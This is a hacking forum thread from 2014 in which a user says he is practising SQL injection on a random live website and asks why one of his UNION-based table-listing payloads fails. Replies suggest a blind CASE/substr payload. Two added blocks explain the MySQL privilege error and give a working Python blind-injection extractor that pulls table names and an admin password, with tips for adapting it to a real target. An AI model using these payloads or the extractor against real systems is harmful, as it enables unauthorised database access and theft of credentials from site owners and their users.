Author Topic: SQL Injection why doesn't a table name check work with concat


Offline hppd

  • Knight
  • **
  • Posts: 163
  • Cookies: 7
SQL Injection why doesn't a table name check work with concat
« on: January 07, 2014, 03:25:04 pm »
Hello
I was practising my sqli on some random website. So everything was going fine up until checking the table names. So I tried
Code:
page.php?ID=0x2d7+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+infromation_schema.tables
It gave the error:
Code:
SELECT command denied to user 'usrmcv'@'127.0.0.1' for table 'tables'
So then I tried
Code:
/page.php?ID=0x2d7/**/union/**/all/**/select/**/1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+information_schema.tables+LIMIT+1,1
Like this I could browse through the tables, and I was wondering why that is.
« Last Edit: January 07, 2014, 03:38:29 pm by hppd »
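The error text in the first query is the one MySQL returns when the privilege check fails before it ever looks the table up, and the two posted queries do not go to the same schema: the first is sent to infromation_schema, the second to information_schema. The script below is an added example, not part of the thread, that reproduces both outcomes on a local MySQL or MariaDB instance. The database name `app`, the table `page`, the row id 727 (0x2d7) and the password are assumptions chosen to mirror the posted requests; the user name 'usrmcv'@'127.0.0.1' is the one from the error message.

```sql
-- Added example (not from the original post). Run steps 1 as an administrator,
-- then steps 2 to 4 connected as usrmcv.

-- 1. Minimal schema and a user that has SELECT on the application database only.
--    (Names and password are assumptions for the demonstration.)
CREATE DATABASE IF NOT EXISTS app;
CREATE TABLE IF NOT EXISTS app.page (id INT PRIMARY KEY, title VARCHAR(64));
INSERT INTO app.page VALUES (727, 'hello');            -- 0x2d7 = 727
CREATE USER IF NOT EXISTS 'usrmcv'@'127.0.0.1' IDENTIFIED BY 'example';
GRANT SELECT ON app.* TO 'usrmcv'@'127.0.0.1';

-- 2. information_schema needs no explicit grant: every user may read it, and it
--    lists the tables the connected user holds at least one privilege on.
--    group_concat() works here exactly as in the posted query.
SELECT group_concat(table_name)
  FROM information_schema.tables
 WHERE table_schema = 'app';

-- 3. The same statement against the misspelled schema name. MySQL treats
--    infromation_schema as an ordinary database, checks privileges on it
--    before checking whether it exists, and answers with the error quoted in
--    the thread:
--    ERROR 1142 (42000): SELECT command denied to user 'usrmcv'@'127.0.0.1' for table 'tables'
SELECT group_concat(table_name) FROM infromation_schema.tables;

-- 4. group_concat() versus LIMIT is not the deciding factor: the per-row form
--    fails against the misspelled schema with the same error 1142, and both
--    forms succeed against the real one.
SELECT table_name FROM information_schema.tables LIMIT 1,1;
SELECT table_name FROM infromation_schema.tables LIMIT 1,1;
```

A quick way to tell the two failure modes apart from the outside: a schema the user cannot see produces "SELECT command denied" (1142), whereas a schema the user can see but that lacks the table produces "Table ... doesn't exist" (1146). A 1142 on information_schema itself is therefore a strong hint that the name in the payload is not what reached the server.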

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
Re: SQL Injection why doesn't a table name check work with concat
« Reply #1 on: January 07, 2014, 06:43:00 pm »
Just a little note: in the first request you are retrieving data in the second column, in the second request you are retrieving data in the third column. Probably makes no difference, though.

This is actually odd. As far as I know, there are no command-specific and table-specific permissions combined, like: if you have access to the table and you can in fact use the group_concat command, there should be no additional permissions for that specific command against that specific table. Are you sure you didn't just typo or something?

Can you group_concat something else from that table? Can you group_concat something else from another table?
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Z3R0

  • Guest
Re: SQL Injection why doesn't a table name check work with concat
« Reply #2 on: January 07, 2014, 09:00:02 pm »
The database user doesn't have permission to do the SELECT command, and since the user the error came back for isn't root, you won't be able to grant the permissions to the usrmcv user by yourself.

Try using CASE WHEN queries with your SELECT query to try bypassing the file priv restrictions. For example:
Code:
page.php?ID=(case(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))when(0x74)then(1)else(2)end)
Keep in mind, with this query, it will only work if all of the concatenated tables begin with the lower-case letter "t" (0x74 hexadecimal). I'm not sure if it will work, because you'll still be using SELECT, but it might because of the CASE WHEN stipulation. You may also run into a problem if the database doesn't allow stacked queries.
« Last Edit: January 07, 2014, 09:01:44 pm by m0rph »
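The payload above is a boolean oracle: the CASE picks row id 1 when one character of the subquery result matches, and a non-existent id otherwise, so the page's response tells you whether the guess was right. The script below is an added example, not code from the thread, that automates that single check into a loop recovering the whole group_concat() string one position at a time. It is a stand-in built on SQLite, since there is no page.php here: the vulnerable statement is assumed to be `SELECT title FROM page WHERE id = <unfiltered ID>`, the table list is read from sqlite_master.name instead of information_schema.tables.table_name, and the sample tables, rows and credentials are constructed for the demonstration.

```python
# Added example, not code from the thread: automating the CASE/substr check
# from the post above so it recovers the whole group_concat() string instead
# of testing one character. Assumptions: SQLite in place of MySQL, a
# sqlite_master table list in place of information_schema.tables, and a
# vulnerable statement of the form
#     SELECT title FROM page WHERE id = <unfiltered ID parameter>
import sqlite3
import string

# Constructed sample database standing in for the target's.
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE page (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE tbl_users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT);
INSERT INTO page VALUES (1, 'home');
INSERT INTO tbl_users VALUES (1, 'admin', 'hunter2');
""")

# Subquery whose result we want to read. The posted version was
# (select(group_concat(table_name))from(information_schema.tables)).
TABLE_LIST = "select group_concat(name) from sqlite_master where type='table'"
ALPHABET = string.ascii_lowercase + string.digits + "_,"


def vulnerable_page(raw_id: str) -> str:
    """Stand-in for page.php?ID=...: the parameter is spliced into the SQL."""
    row = DB.execute(f"SELECT title FROM page WHERE id = {raw_id}").fetchone()
    return row[0] if row else "not found"


def case_payload(subquery: str, pos: int, ch: str) -> str:
    """Same shape as the posted payload: CASE yields id 1 when the character
    at `pos` of the subquery result equals `ch`, else id 2 (no such row).
    char(N) stands in for the 0x74 literal because SQLite reads 0x74 as the
    integer 116, not as a one-byte string."""
    return (f"(case(substr(({subquery}),{pos},1))"
            f"when(char({ord(ch)}))then(1)else(2)end)")


def char_matches(subquery: str, pos: int, ch: str) -> bool:
    """The boolean oracle: true iff the page rendered the id=1 row."""
    return vulnerable_page(case_payload(subquery, pos, ch)) == "home"


def first_char_is(subquery: str, ch: str) -> bool:
    """The single check from the post: does the result start with `ch`?"""
    return char_matches(subquery, 1, ch)


def extract(subquery: str, alphabet: str = ALPHABET, max_len: int = 256) -> str:
    """Recover the subquery result one position at a time.
    substr() past the end returns '', which matches no alphabet character,
    so the scan stops at the first position with no match."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if char_matches(subquery, pos, ch):
                result += ch
                break
        else:
            break
    return result


if __name__ == "__main__":
    print("starts with 't':", first_char_is(TABLE_LIST, "t"))
    print("table list:", extract(TABLE_LIST))
    print("admin pw:", extract("select pw from tbl_users where name='admin'"))
```

Two points worth keeping in mind when adapting this to a real target. The CASE expression does not change whose privileges the inner SELECT runs under; the subquery is still executed by the same database user, so a SELECT it is not allowed to make fails the same way inside a CASE. And because the whole payload evaluates to a single value inside the original statement's WHERE clause, stacked queries are not required; the cost is instead one request per candidate character per position, which is why a narrowed alphabet (or a binary search on the character code) matters on a slow target.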

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
Re: SQL Injection why doesn't a table name check work with concat
« Reply #3 on: January 07, 2014, 10:09:24 pm »
Quote from: Z3R0
The database user doesn't have permission to do the SELECT command, and since the user the error came back for isn't root, you won't be able to grant the permissions to the usrmcv user by yourself.

Try using CASE WHEN queries with your SELECT query to try bypassing the file priv restrictions. For example:
Code:
page.php?ID=(case(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))when(0x74)then(1)else(2)end)
Keep in mind, with this query, it will only work if all of the concatenated tables begin with the lower-case letter "t" (0x74 hexadecimal). I'm not sure if it will work, because you'll still be using SELECT, but it might because of the CASE WHEN stipulation. You may also run into a problem if the database doesn't allow stacked queries.

I don't think there is a permission problem, seeing how he was able to use the SELECT command in the second query, just without group_concat. But yes, you are right in your statement: CASE WHEN and HAVING are useful for circumventing such problems.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Z3R0

  • Guest
Re: SQL Injection why doesn't a table name check work with concat
« Reply #4 on: January 07, 2014, 10:58:00 pm »
@ande LOL derp, I didn't see he wrote that his second query worked. My mistake!